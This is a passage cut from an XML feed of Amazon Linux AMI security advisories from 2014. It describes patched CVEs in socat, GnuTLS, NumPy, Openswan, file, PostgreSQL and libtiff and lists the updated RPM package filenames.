arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.34" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.34" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.34-4.12.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.34" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.34-4.12.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.34" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.34-4.12.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.34" release="4.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/lighttpd-1.4.34-4.12.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.34" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-300</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-300: low priority package update for socat</title><issued date="2014-03-06 14:57:00" /><updated date="2014-09-16 22:36:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0019:
Stack-based buffer overflow in socat 1.3.0.0 through 1.7.2.2 and 2.0.0-b1 through 2.0.0-b6 allows local users to cause a denial of service (segmentation fault) via a long server name in the PROXY-CONNECT address in the command line.
1057746:
CVE-2014-0019 socat: PROXY-CONNECT address overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0019" title="" id="CVE-2014-0019" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="socat-debuginfo" version="1.7.2.3" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-debuginfo-1.7.2.3-1.10.amzn1.x86_64.rpm</filename></package><package name="socat" version="1.7.2.3" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-1.7.2.3-1.10.amzn1.x86_64.rpm</filename></package><package name="socat" version="1.7.2.3" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/socat-1.7.2.3-1.10.amzn1.i686.rpm</filename></package><package name="socat-debuginfo" version="1.7.2.3" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/socat-debuginfo-1.7.2.3-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-301</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-301: important priority package update for gnutls</title><issued date="2014-03-06 14:58:00" /><updated date="2014-09-17 22:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0092:
It was discovered that GnuTLS did not correctly handle certain errors that could occur during the verification of an X.509 certificate, causing it to incorrectly report a successful verification. An attacker could use this flaw to create a specially crafted certificate that could be accepted by GnuTLS as valid for a site chosen by the attacker.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0092" title="" id="CVE-2014-0092" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0246.html" title="" id="RHSA-2014:0246" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="13.11.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-13.11.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="13.11.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-13.11.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="13.11.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-13.11.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="13.11.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-13.11.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="13.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-13.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-302</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-302: low priority package update for numpy</title><issued date="2014-03-10 09:40:00" /><updated date="2014-09-17 22:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1859:
1062009:
CVE-2014-1858 CVE-2014-1859 numpy: f2py insecure temporary file use
CVE-2014-1858:
1062009:
CVE-2014-1858 CVE-2014-1859 numpy: f2py insecure temporary file use
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1858" title="" id="CVE-2014-1858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1859" title="" id="CVE-2014-1859" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="numpy-doc" version="1.7.2" release="8.10.amzn1" epoch="1" arch="noarch"><filename>Packages/numpy-doc-1.7.2-8.10.amzn1.noarch.rpm</filename></package><package name="numpy" version="1.7.2" release="8.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/numpy-1.7.2-8.10.amzn1.x86_64.rpm</filename></package><package name="numpy-f2py" version="1.7.2" release="8.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/numpy-f2py-1.7.2-8.10.amzn1.x86_64.rpm</filename></package><package name="numpy-debuginfo" version="1.7.2" release="8.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/numpy-debuginfo-1.7.2-8.10.amzn1.x86_64.rpm</filename></package><package name="numpy-f2py" version="1.7.2" release="8.10.amzn1" epoch="1" arch="i686"><filename>Packages/numpy-f2py-1.7.2-8.10.amzn1.i686.rpm</filename></package><package name="numpy-debuginfo" version="1.7.2" release="8.10.amzn1" epoch="1" arch="i686"><filename>Packages/numpy-debuginfo-1.7.2-8.10.amzn1.i686.rpm</filename></package><package name="numpy" version="1.7.2" release="8.10.amzn1" epoch="1" arch="i686"><filename>Packages/numpy-1.7.2-8.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-303</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-303: medium priority package update for openswan</title><issued date="2014-03-10 09:40:00" /><updated date="2014-09-17 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6466:
A NULL pointer dereference flaw was discovered in the way Openswan's IKE daemon processed IKEv2 payloads. A remote attacker could send specially crafted IKEv2 payloads that, when processed, would lead to a denial of service (daemon crash), possibly causing existing VPN connections to be dropped.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6466" title="" id="CVE-2013-6466" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0185.html" title="" id="RHSA-2014:0185" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openswan-doc" version="2.6.37" release="3.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-doc-2.6.37-3.17.amzn1.x86_64.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="3.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-debuginfo-2.6.37-3.17.amzn1.x86_64.rpm</filename></package><package name="openswan" version="2.6.37" release="3.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-2.6.37-3.17.amzn1.x86_64.rpm</filename></package><package name="openswan" version="2.6.37" release="3.17.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-2.6.37-3.17.amzn1.i686.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="3.17.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-debuginfo-2.6.37-3.17.amzn1.i686.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="3.17.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-doc-2.6.37-3.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-304</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-304: medium priority package update for file</title><issued date="2014-03-13 18:12:00" /><updated date="2014-09-17 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1943:
Fine Free file before 5.17 allows context-dependent attackers to cause a denial of service (infinite recursion, CPU consumption, and crash) via a crafted indirect offset value in the magic of a file.
1065836:
CVE-2014-1943 file: infinite recursion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943" title="" id="CVE-2014-1943" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-debuginfo" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="file" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="python-magic" version="5.11" release="13.14.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.11-13.14.amzn1.noarch.rpm</filename></package><package name="file-libs" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.11" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.11-13.14.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.11" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.11-13.14.amzn1.i686.rpm</filename></package><package name="file-static" version="5.11" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.11-13.14.amzn1.i686.rpm</filename></package><package name="file" version="5.11" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.11-13.14.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.11" release="13.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/file-libs-5.11-13.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-305</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-305: important priority package update for postgresql8</title><issued date="2014-03-13 18:12:00" /><updated date="2014-09-17 22:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0066:
It was found that the chkpass extension of PostgreSQL did not check the return value of the crypt() function. An authenticated database user could possibly use this flaw to crash PostgreSQL via a null pointer dereference.
CVE-2014-0065:
Multiple potential buffer overflow flaws were found in PostgreSQL. An authenticated database user could possibly use these flaws to crash PostgreSQL or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0064:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in various type input functions in PostgreSQL. An authenticated database user could possibly use these flaws to crash PostgreSQL or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0063:
Multiple stack-based buffer overflow flaws were found in the date/time implementation of PostgreSQL. An authenticated database user could provide a specially crafted date/time value that, when processed, could cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0062:
A race condition was found in the way the CREATE INDEX command performed multiple independent lookups of a table that had to be indexed. An authenticated database user could possibly use this flaw to escalate their privileges.
CVE-2014-0061:
A flaw was found in the validator functions provided by PostgreSQL's procedural languages (PLs). An authenticated database user could possibly use this flaw to escalate their privileges.
CVE-2014-0060:
It was found that granting an SQL role to a database user in a PostgreSQL database without specifying the "ADMIN" option allowed the grantee to remove other users from their granted role. An authenticated database user could use this flaw to remove a user from an SQL role which they were granted access to.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0060" title="" id="CVE-2014-0060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0061" title="" id="CVE-2014-0061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0062" title="" id="CVE-2014-0062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0063" title="" id="CVE-2014-0063" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0064" title="" id="CVE-2014-0064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0065" title="" id="CVE-2014-0065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0066" title="" id="CVE-2014-0066" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0211.html" title="" id="RHSA-2014:0211" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-pltcl" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package 
name="postgresql8-libs" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-1.44.amzn1.i686.rpm</filename></package><package 
name="postgresql8-devel" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-306</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-306: important priority package update for postgresql9</title><issued date="2014-03-13 18:12:00" /><updated date="2014-09-17 22:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0066:
It was found that the chkpass extension of PostgreSQL did not check the return value of the crypt() function. An authenticated database user could possibly use this flaw to crash PostgreSQL via a null pointer dereference.
CVE-2014-0065:
Multiple potential buffer overflow flaws were found in PostgreSQL. An authenticated database user could possibly use these flaws to crash PostgreSQL or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0064:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in various type input functions in PostgreSQL. An authenticated database user could possibly use these flaws to crash PostgreSQL or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0063:
Multiple stack-based buffer overflow flaws were found in the date/time implementation of PostgreSQL. An authenticated database user could provide a specially crafted date/time value that, when processed, could cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0062:
A race condition was found in the way the CREATE INDEX command performed multiple independent lookups of a table that had to be indexed. An authenticated database user could possibly use this flaw to escalate their privileges.
CVE-2014-0061:
A flaw was found in the validator functions provided by PostgreSQL's procedural languages (PLs). An authenticated database user could possibly use this flaw to escalate their privileges.
CVE-2014-0060:
It was found that granting an SQL role to a database user in a PostgreSQL database without specifying the "ADMIN" option allowed the grantee to remove other users from their granted role. An authenticated database user could use this flaw to remove a user from an SQL role which they were granted access to.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0060" title="" id="CVE-2014-0060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0061" title="" id="CVE-2014-0061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0062" title="" id="CVE-2014-0062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0063" title="" id="CVE-2014-0063" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0064" title="" id="CVE-2014-0064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0065" title="" id="CVE-2014-0065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0066" title="" id="CVE-2014-0066" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0211.html" title="" id="RHSA-2014:0211" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql9-server" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-server-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-test" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-test-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-upgrade" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-upgrade-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-pltcl" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-pltcl-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-contrib" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-contrib-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9" 
version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-docs" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-docs-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plpython" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plpython-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-debuginfo" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-debuginfo-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-devel" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-devel-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plperl" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plperl-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-libs-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-server" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-server-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-libs" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-libs-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-upgrade" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-upgrade-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-plpython" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plpython-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-contrib" version="9.2.7" 
release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-contrib-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-test" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-test-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-debuginfo" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-debuginfo-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-pltcl" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-pltcl-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-plperl" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plperl-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-docs" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-docs-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-devel" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-devel-9.2.7-1.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-307</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-307: medium priority package update for libtiff</title><issued date="2014-03-13 18:13:00" /><updated date="2014-09-17 22:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4244:
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
CVE-2013-4243:
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
CVE-2013-4232:
A heap-based buffer overflow and a use-after-free flaw were found in the tiff2pdf tool. An attacker could use these flaws to create a specially crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
CVE-2013-4231:
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
CVE-2013-1961:
Multiple buffer overflow flaws were found in the tiff2pdf tool. An attacker could use these flaws to create a specially crafted TIFF file that would cause tiff2pdf to crash.
CVE-2013-1960:
A heap-based buffer overflow and a use-after-free flaw were found in the tiff2pdf tool. An attacker could use these flaws to create a specially crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
CVE-2010-2596:
A flaw was found in the way libtiff handled OJPEG-encoded TIFF images. An attacker could use this flaw to create a specially crafted TIFF file that would cause an application using libtiff to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2596" title="" id="CVE-2010-2596" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1960" title="" id="CVE-2013-1960" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1961" title="" id="CVE-2013-1961" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4231" title="" id="CVE-2013-4231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4232" title="" id="CVE-2013-4232" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4243" title="" id="CVE-2013-4243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4244" title="" id="CVE-2013-4244" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0222.html" title="" id="RHSA-2014:0222" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-debuginfo" version="3.9.4" release="10.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-3.9.4-10.12.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="10.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-3.9.4-10.12.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="3.9.4" release="10.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-3.9.4-10.12.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="10.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-3.9.4-10.12.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="3.9.4" release="10.12.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-3.9.4-10.12.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="10.12.amzn1" epoch="0" 
